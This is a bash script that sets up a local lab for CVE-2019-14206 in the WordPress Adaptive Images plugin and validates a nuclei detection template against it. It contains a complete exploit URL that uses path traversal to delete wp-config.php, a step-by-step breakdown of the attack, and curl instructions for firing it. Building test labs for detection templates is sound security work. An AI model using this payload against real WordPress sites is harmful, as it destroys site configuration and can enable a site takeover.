#!/bin/bash
# CVE-2019-14206 - Complete Local Test Environment
# Tests the vulnerability without requiring Docker

echo "========================================="
echo "CVE-2019-14206 Local Test Environment"
echo "========================================="
echo ""

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Setup
TEST_DIR="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc"
cd "$TEST_DIR"

echo -e "${YELLOW}[*] Setting up test environment...${NC}"

# Create directories
mkdir -p wp-content/uploads/2019/07
mkdir -p wp-content/cache/ai-cache

# Create test image
echo "GIF89a" > wp-content/uploads/2019/07/image.jpeg

# Create wp-config.php
cat > wp-config.php << 'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'wordpress');
define('DB_HOST', 'localhost');
define('AUTH_KEY', 'test-key');
define('LOGGED_IN_KEY', 'test-key');
echo "WP Config file exists\n";
EOF

echo -e "${GREEN}[+] Test environment created${NC}"
echo ""

# Test 1: Show vulnerable code
echo -e "${YELLOW}[*] Test 1: Showing vulnerable code structure...${NC}"
echo "The vulnerable adaptive-images-script.php uses:"
echo "  \$settings = \$_REQUEST['adaptive-images-settings'];"
echo "  \$cache_file = \$wp_content . '/' . \$cache_dir . '/' . \$resolution . \$request_uri;"
echo ""

# Test 2: Show exploit URL
echo -e "${YELLOW}[*] Test 2: Constructing exploit URL...${NC}"
EXPLOIT_URL="http://localhost:8000/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"
echo "URL: $EXPLOIT_URL"
echo ""

# Test 3: Validate template
echo -e "${YELLOW}[*] Test 3: Validating nuclei template...${NC}"
nuclei -t http/cves/2019/CVE-2019-14206.yaml -u http://localhost:8000 -v 2>&1 | head -20
echo ""

# Test 4: Show what the exploit does
echo -e "${YELLOW}[*] Test 4: Exploit analysis...${NC}"
echo "Attack breakdown:"
echo "  1. source_file points to existing image (timestamp check bypass)"
echo "  2. wp_content='.' sets base to current directory"
echo "  3. cache_dir='../../..' enables path traversal"
echo "  4. request_uri='wp-config.php' sets target file"
echo "  5. resolution=16000 + request_uri creates path: ./../../..//wp-config.php"
echo "  6. watch_cache=1 enables the delete function"
echo ""

# Test 5: Check files exist before attack
echo -e "${YELLOW}[*] Test 5: Checking files before exploit...${NC}"
if [ -f "wp-config.php" ]; then
    echo -e "${GREEN}[+] wp-config.php exists${NC}"
else
    echo -e "${RED}[-] wp-config.php not found${NC}"
fi

if [ -f "plugin/adaptive-images-script.php" ]; then
    echo -e "${GREEN}[+] Vulnerable script exists${NC}"
else
    echo -e "${RED}[-] Vulnerable script not found${NC}"
fi

echo ""
echo -e "${YELLOW}[*] To test the actual exploit:${NC}"
echo "  1. Start PHP server: cd $TEST_DIR && php -S localhost:8000"
echo "  2. In another terminal: curl '$EXPLOIT_URL'"
echo "  3. Check if wp-config.php was deleted"
echo ""

echo -e "${GREEN}[+] Local test environment ready!${NC}"
echo "========================================="
